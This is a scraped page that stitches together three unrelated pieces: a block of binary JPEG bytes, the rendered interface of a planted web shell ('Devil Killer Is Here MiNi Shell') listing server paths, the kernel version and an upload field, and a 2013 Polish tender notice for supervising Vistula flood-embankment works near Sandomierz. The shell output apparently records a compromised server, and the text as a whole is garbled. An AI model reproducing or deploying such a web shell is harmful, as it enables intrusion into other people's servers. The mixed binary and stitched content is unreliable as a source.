JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130918/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130918/189561-N-2013.html

<p class="kh_header"><b>Kielce: pełnienie nadzoru inwestorskiego nad realizacją zadania pn. Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmie-rzów w msc. Sandomierz - etap I w 0+000 - 1+500</b><br>
<b>Numer ogłoszenia: 189561 - 2013; data zamieszczenia: 18.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie nadzoru inwestorskiego nad realizacją zadania pn. Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmie-rzów w msc. Sandomierz - etap I w 0+000 - 1+500.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Opis przedmiotu zamówienia i miejsce realizacji przedmiotu zamówienia

Kod wg CPV -  71.52.00.00.9 - usługi nadzoru budowlanego.

1. Przedmiot zamówienia.
 
Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad realizacją zadania p.n.:.: Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 -3+350 Huta Szkła - Koćmierzów w msc. Sandomierz - etap I w km 0+000 - 1+500 w zakresie objętym dokumentacją projektową, zaktualizowaną przez Zespół Usług Projektowych i Ekologicznych EKOWODA s.c., ul. Przemysłowa 11, 35+105 Rzeszów, składającą się z: projektu budowlanego, projektu wykonawczego, specyfikacji technicznej wykonania i odbioru robót oraz przedmiaru robót. Z dokumentacją techniczną w formie pisemnej można zapoznać się w ŚZMiUW w Kielcach, ul. Witosa 86 (II piętro, p. 212) w dni robocze od poniedziałku do piątku od godz. 9:00 do 14:00. 

Wykonawca musi zapewnić nadzór inwestorski przy realizacji w/w zadania, w ramach, którego będzie sprawowany nadzór inwestorski nad robotami budowlano - montażowymi zgodnie z dokumentacją techniczną.

1.1 Zakres robót, nad którymi sprawowany będzie nadzór inwestorski:

Przedmiotowy odcinek wału wymaga podwyższenia korony wału oraz związanej z tym zmiany parametrów przekroju poprzecznego wału a także wykonania urządzeń funkcjonalnie z nim związanych. Realizowana inwestycja będzie polegała na podwyższeniu i rozbudowie prawego wału rzeki Wisły w km 0+000 - 1+500 poprzez wykonanie m.in. następujących robót:
1. Roboty pomiarowe, ścinanie drzew i karczowanie krzaków;
2. Roboty ziemne i konstrukcyjne - zabezpieczenie przeciwfiltracyjne skarpy odwodnej wału ekranem z geomembrany PCV grubości 1,5mm obustronnie uszorstkowionej oraz podłoża wału pionową przesłoną bentonitowo-cementową o głębokości 10,0m;
3. Budowa ramp wałowych; 
4. Roboty ziemne i konstrukcyjne:
-droga przeciwpowodziowa na zawalu L=3350m;
-droga dojazdowa do pól w międzywalu L=900mb;
5. Komora wylotowa z przepompowni wód deszczowych z terenu Huty Szkła  z przepustem;
6.Prace w rezerwie;
7.Roboty rozbiórkowe;
8.Drogi technologiczne;

Projektowane parametry wału:
- szerokość korony wału 3,00m
- nachylenie odwodnej 1:2,5
- nachylenie skarpy odpowietrznej 1:2
- rzędna korony wału w km 0+000- 149,41m npm
- rzędna korony wału w km 0+500 - 149,53m npm
- rzędna korony wału w km 0+610 - 149,59 m npm
- rzędna korony wału w km 1+500- 149,87 m npm.

Przedsięwzięcie przewidziane jest do realizacji w ramach Programu ochrony przed powodzią  w dorzeczu górnej Wisły, wchodzi w zakres zadania inwestycyjnego mającego na celu ochronę przed powodzią terenów doliny Sandomiersko-Tarnobrzeskiej, obejmujących obszar   o powierzchni około 49,0km2 z rozwiniętą infrastrukturą osadniczo-przemysłową. Na obszarze bezpośrednio przyległym do rozpatrywanego dolnego odcinka wału, obejmującym teren o po-wierzchni ca 14,2km2, zlokalizowany jest bardzo ważny ośrodek gospodarczy jakim jest Huta Szkła w m. Sandomierz. Planowane przedsięwzięcie obejmujące rozbudowę prawego odcinka wału rzeki Wisły należy traktować jako początek długofalowego procesu rozbudowy wałów Wi-sły w tym rejonie.
Kilometraż omawianego odcinka prawego wału rzeki Wisły rozpoczyna się na wysokości Huty Szkła w msc. Sandomierz (km0+000) i ciągnie się w górę rzeki Wisły do m. Koćmierzów.
Przedmiotowa inwestycja zlokalizowana jest częściowo (w międzywalu) w obszarze Natura 2000 Tarnobrzeska Dolina Wisły.
W początkowym odcinku wału, w odległości już od 1m od stopy obecnego wału, występuje 11 sztuk topoli przeznaczonych do wycinki oraz krzewy o powierzchni ok. 1200m2 (300m2 + 900m2), które znajdują się na działkach o nr ewid.1304/1 i 1477. Wycinkę drzew i krzewów należy prowadzić w okresie pozalęgowym, tj. od połowy października do końca lutego. Za usunięte drzewa i krzewy Wykonawca zobowiązany jest do wykonania nasadzeń sadzonek wierzb i topoli na terenie byłego placu manewrowego i drogi technologicznej.

Zakres obowiązków inspektorów nadzoru inwestorskiego określa Rozdział 3 (art. 25-26) ustawy Prawo budowlane z dnia 7 lipca 1994 r. (t.j. Dz. U. z 2010 r. Nr 243 poz. 1623 z późn. zm.). Inspektor Nadzoru jest przedstawicielem Zamawiającego wobec Wykonawcy robót budowlanych, w granicach posiadanego umocowania określonego w umowie. Inspektor Nadzoru Inwestorskiego winien współpracować z Zamawiającym zapewniając sprawną, zgodną z dokumentacją projektową i zgodą na realizację inwestycji, obsługę realizacji zadania, jego odbioru oraz rozliczenia, tj. sprawdzania kompletności wszystkich dokumentów Wykonawcy robót budowlanych przygotowanych do odbioru końcowego i ich zgodności z dokumentacją projektową, potwierdzanie dokumentów Zamawiającego związanych z pozyskaniem i rozliczeniem środków finansowych na realizację zadania.

1.2 Ponadto przedmiot zamówienia obejmuje m.in.:

a)	Współdziałanie z Zamawiającym w zakresie technicznym, kosztowo-rozliczeniowym w tym sprawdzanie zakresu rzeczowego i kosztorysów zapewniając przy tym sprawną, zgodną z dokumentacją projektową i zgodą na realizację inwestycji, obsługę realizacji zadania, jego odbioru oraz rozliczenia, tj. sprawdzania kompletności wszystkich dokumentów Wykonawcy robót budowlanych przygotowanych do odbioru końcowego i ich zgodności z dokumentacją projektową,

b)	Udział w przekazaniu Wykonawcy robót budowlanych, placu budowy.

c)	Współdziałanie z Zamawiającym w zakresie problematyki robót zamiennych lub  dodatkowych wychodzących poza zakres rzeczowy umowy na roboty budowlane, w tym sprawdzanie zakresu rzeczowego i kosztorysów.

d)	Przygotowanie w trakcie realizacji robót projektów aneksów do umów o ewentualne ro-boty budowlane, zamienne lub dodatkowe, lub opiniowanie takich projektów przygotowanych przez Zamawiającego.

e)	Udział w naradach technicznych dotyczących wykonywanych robót.

f)	Przygotowywanie wspólnie z Wykonawcą projektu podziału zadania na elementy do fakturowania i odbioru.

g)	Współdziałanie z nadzorem autorskim w czasie trwania realizacji przedmiotu umowy celem rozwiązywania bieżących problemów realizacyjnych dla zabezpieczenia interesów Inwestora.

h)	Udział w załatwianiu spraw spornych z miejscową ludnością oraz skarg wynikających z realizowanych robót, w tym prowadzenie ewentualnych negocjacji w konfliktach z władzami samorządowymi i mieszkańcami;

i)	Opracowanie i przedstawienie do akceptacji Zamawiającemu w terminie 1 dzień przed podpisaniem umowy schematu organizacyjnego zespołu Wykonawcy wraz ze szczegółowym zakresem obowiązków i uprawnień, jakie zamierza powierzyć poszczególnym członkom zespołu, wraz ze wskazaniem koordynatora zespołu nadzoru.

j)	Dostarczenie w terminie 1 dzień przed podpisaniem umowy oświadczeń inspektorów nadzoru wchodzących w skład zespołu stwierdzających przyjęcie obowiązków inspektorów nadzoru nad inwestycją.

k)	Zapewnienie codziennego pobytu inspektora nadzoru na budowie w trakcie realizacji robót oraz na każde wezwanie Zamawiającego. Potwierdzeniem pobytu jest wpis do dziennika budowy;

l)	Nadzorowanie budowy a także zapewnienie nadzoru inwestorskiego nad realizacją inwestycji, a w szczególności monitorowanie realizacji inwestycji, nadzorowanie i odbiór robót, kontrola jakości materiałów do stosowania przy wykonywaniu ścianki szczelnej stalowej (kontrola w trakcie wykonywania ścianki, zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót), w częstotliwości zapewniającej skuteczny nadzór tj. obecność codzienna; Inspektor Nadzoru ponosi odpowiedzialność za wszelkie opóźnienia, nieprawidłowości lub wady, do których przyczynił się w szczególności poprzez brak zapewnienia wymaganego przepisami prawa lub umową nadzoru; Potwierdzeniem pobytu jest wpis do dziennika budowy. Poszczególni inspektorzy nadzoru mają prawo dokonywać zapisu w dzienniku budowy wyłącznie w zakresie powierzonych im czynności nadzoru.

m)	Bieżąca kontrola - sprawdzanie pod względem merytorycznym i formalno-prawnym faktur wykonawcy robót budowlanych oraz załączonych protokołów odbioru (częściowych bądź końcowego) i kosztorysów - w terminie do 3 dni roboczych od ich otrzymania; 
Każdorazowe sprawdzanie kosztorysów pod względem merytorycznym i formalno-rachunkowym w oparciu o faktycznie stwierdzoną  ilość wykonanych robót.

n)	Dokonywanie odbiorów częściowych w terminie określonym w harmonogramie rzeczowofinansowym oraz udział w odbiorze końcowym zadania, a także nadzór nad usunięciem stwierdzonych usterek i niedoróbek.

o)	Kontrolować przestrzeganie przez Wykonawcę zasad BHP, wstrzymać roboty w przypadku prowadzenia ich niezgodnie z zamówieniem i przepisami BHP

p)	Wyrywkowa kontrola stopnia zagęszczenia gruntu.

q)	Wykonywanie kontrolnych pomiarów geodezyjnych.

r)	Udział w przeglądach gwarancyjnych.

s)	Końcowe rozliczenie zadania wraz ze sporządzeniem wymaganych dokumentów w tym kompletnego operatu powykonawczego

t)	Przekazywanie na bieżąco Inwestorowi informacji z rzeczowego i finansowego zaawansowania realizacji zadania, a także informacje o wszelkich problemach związanych z realizacją inwestycji;

u)	Pełnienie obsługi prawnej w szerokim tego słowa znaczeniu, w tym interpretacji prawnej wszelkich zaistniałych faktów i zdarzeń na budowie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert, z uwzględnieniem 30-to dniowego terminu związania ofertą. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest poręczeniem pieniężnym,  gwarancjach bankowych lub ubezpieczeniowych, poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 z późn. zm).
   z dopiskiem: 
Wadium w przetargu nieograniczonym na pełnienie nadzoru inwestorskiego nad realizacja zadania pn.Podwyższenie i rozbudowa prawego wału rzeki Wisły w km 0+000 - 3+350 Huta Szkła - Koćmierzów w msc. Sandomierz - etap I w 0+000 - 1+500.

Wysokość wadium ustala się w kwocie 7.000,00 zł (słownie: siedem tysięcy zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadania wiedzy i doświadczenia, w realizacji usług odpowiadających przedmiotowi zamówienia tj.:

1.1.	Wykonania w okresie ostatnich trzech lat przed upływem składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług pełnienia funkcji nadzoru inwestorskiego lub zastępstwa inwestycyjnego nad budową, prze-budową lub rozbudową, w tym wykonanie w ramach tych usług:

1.1.1.	zakresu prac, o którym mowa w pkt. 1.2.1 niniejszego rozdziału,
 
1.1.2.	funkcji nadzoru inwestorskiego w rozumieniu art. 25 Prawa budowlanego nad - 2 budowami ( budowa lub rozbudowa wałów przeciwpowodziowych o podobnym charakterze robót budowlanych, co usługa stanowiąca przedmiot zamówienia o łącznej wartości brutto robót nie mniejszej niż 10.000.000,00 zł w tym jedna o wartości min 5.000.000,00 zł, spełniających łącznie ( tzn. obydwie w/w 2 usługi łącznie - sumarycznie) wymogi określone w 1.2.2 niniejszego rozdziału

1.2.	Przez podobny charakter przedmiotu zamówienia rozumie się:

1.2.1.	pełnienie usług w zakresie rzeczowym wynikającym z opisu przedmiotu zamówienia (co najmniej dla jednej usługi), o których mowa w rozdz. I SIWZ pkt. 1.2 lit.: a, c, d, h, m, s  w zakresie rozliczenia końcowego, i u w zakresie realizacji inwestycji. 

1.2.2.	pełnienie nadzoru - co najmniej nad dwoma budowami tj. nad budową lub prze-budową wałów przeciwpowodziowych obejmującą roboty w zakresie:

a)	robót ziemnych w zakresie budowy, przebudowy i rozbudowy wałów w zakresie robót ziemnych z rampami o łącznej objętości łącznie nie mniejszej niż 25.000 m3.   
b)	zabezpieczenia wałów przesłoną bentonitowo-cementową w technologii DSM lub z pali łącznej powierzchni, co najmniej 10.000 m2.
c)	zabezpieczenia przeciwfiltracyjnych wałów w formie folii hydroizolacyjnej o łącznej powierzchni dla obydwu budów, co najmniej 15.000,0 m2 ,

1.2.3. Ponadto Wykonawca powinien posiadać doświadczenie w zakresie:
budowy, przebudowy lub remontu dróg przywałowych o łącznej długości, co najmniej 5000,0 m2, jak i doświadczenie w nadzorowaniu robót w zakresie budowy, przebudowy lub remontu dróg z wykonaniem nawierzchni mineralno -
 asfaltowych lub z betonu asfaltowego o łącznej powierzchni nie mniejszej niż 2000,00 m2. 
Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty
2.	dokumentami potwierdzającymi spełnianie warunku, o którym mowa w  pkt. 1  muszą być:

2.1.	sporządzony przez Wykonawcę wykaz nadzorów inwestorskich w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i posiadania doświadczenia we wzorze stanowiącym załącznik nr 6 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w  pkt. 1.1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał. 

2.2.	dokumenty potwierdzające, że nadzory przedstawione w wykazie zrealizowanych zadań zostały wykonane należycie, np. poświadczenie, referencje. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - tj. 

1.1.	Inspektorami nadzoru tj.:

1.1.1.	minimum dwoma osobami posiadającymi wyższe wykształcenie i uprawnienia w specjalności odpowiedniej do nadzorowania robót z zakresu melioracji wodnych w tym jedną pełniącą funkcję koordynatora zespołu inspektorów nadzoru. 

1.1.1.1.	w/w osoby, każda z osobna przewidziane do pełnienia funkcji inspektora nadzoru, winna posiadać doświadczenie w nadzorowaniu robót budowlanych, w tym: dwie budowy, każda w zakresie wykonanie: budowy, przebudowy, roz-budowy lub remontu wałów przeciwpowodziowych obejmujących także roboty dotyczące:
-  zabezpieczeń przeciwfiltracyjnych w zakresie: folii hydroizolowanej dwustronnie uszorstkowanej o pow. min. 15.000 m2 dla obydwu budów , 
- zabezpieczenia przesłoną bentonirowo-cementową w technologii DSM lub równoważnej z pali o łącznej powierzchni, co najmniej 10.000m2,  

1.1.1.2.	niezależnie od powyższego, co najmniej jedną osobą spośród wymienionych w pkt. 1.1.1 posiadającą doświadczenie w nadzorowaniu robót konstrukcyjno-budowlanych w zakresie budowy, przebudowy lub remontu: 
- dróg przywałowych o łącznej powierzchni nie mniejszej niż łącznie 5.000 m2 jak dróg o nawierzchni  mineralno - asfaltowej lub z betonu asfaltowego o łącznej pow., co najmniej 2000,0 m2,
- robót w zakresie budowy, przebudowy lub rozbudowy pompowni lub prze-pompowni wałowych w części dotyczącej robót konstrukcyjno - budowlanych bez technologii. 
 
1.2.	Osobami do rozliczeń rzeczowo-finansowych i kosztowych:

1.2.1.	co najmniej:
1.2.1.1.	- jedną osobą posiadająca wykształcenie techniczne wraz z uprawnieniami budowlanymi oraz doświadczenie w obsłudze programów komputerowych w zakresie kosztorysowania np. norma,
1.2.1.2.	- jedną osobą posiadającą wyższe wykształcenie ze znajmością prowadzenia urządzeń księgowo-finansowych z uwzględnieniem problematyki rozliczeń inwestycji,

posiadające każda, co najmniej trzyletnie doświadczenie w rozliczeniach rzeczowo finansowych i kosztowych zadań inwestycyjnych, ze znajomością oceny i weryfikacji kosztorysów ofertowych, w tym posiada w/w okresie udokumentowane doświadczenie w rozliczeniu końcowym rzeczowo-finansowym, oraz weryfikacji kosztorysów ofertowych, co najmniej dla dwóch zdań inwestycyjnych. 
1.3.	Osobami do pełnienia obsługi prawnej.
1.3.1.	co najmniej jedną osobą fizyczną posiadającą wyższe wykształcenie prawnicze lub osobą prawną posiadające stosowne doświadczenie w zakresie prowadzenia spraw cywilno-prawnych i administracyjnych w odniesieniu do realizacji inwestycji na etapie wykonywania robót budowlanych.        

	Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty:
2.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1 muszą być: 

2.1.	Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniający wymagania określone w  pkt. 1  we wzorze stanowiącym załączniki nr 2 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W wykazie należy udokumentować kwalifikacje zawodowe, w stosunku do osób, wymienionych w pkt. 1 . W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał,

2.2.	Do wykazu należy złączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	sytuacji ekonomicznej i finansowej tj. posiadają zdolność ekonomiczno-finansową do realizacji przedmiotowego zamówienia:

1.1.	posiadają środki finansowe lub zdolność kredytową w wysokości 300 000 zł.
   
Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty 
	dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1.1 muszą być:

- informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków lub zdolność kredytową Wykonawcy - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika. Informacja winna potwierdzać spełnienie warunku określonego w pkt. 1.1. Jeżeli Wykonawca, wykazując spełnienie warunku, o którym mowa w pkt 1 , polega na zdolnościach finansowych innych podmiotów na zasadach określonych art.26 ust. 2b usta-wy, wymaga się przedłożenia informacji o której mowa w wyżej, dotyczącej tych podmiotów.


1.2.	posiadają ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na kwotę co najmniej 1. 500 000 zł.

Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty
 - opłacona polisa a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika. Przedłożony dokument winien potwierdzać spełnienie warunku określonego w pkt. 1.2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

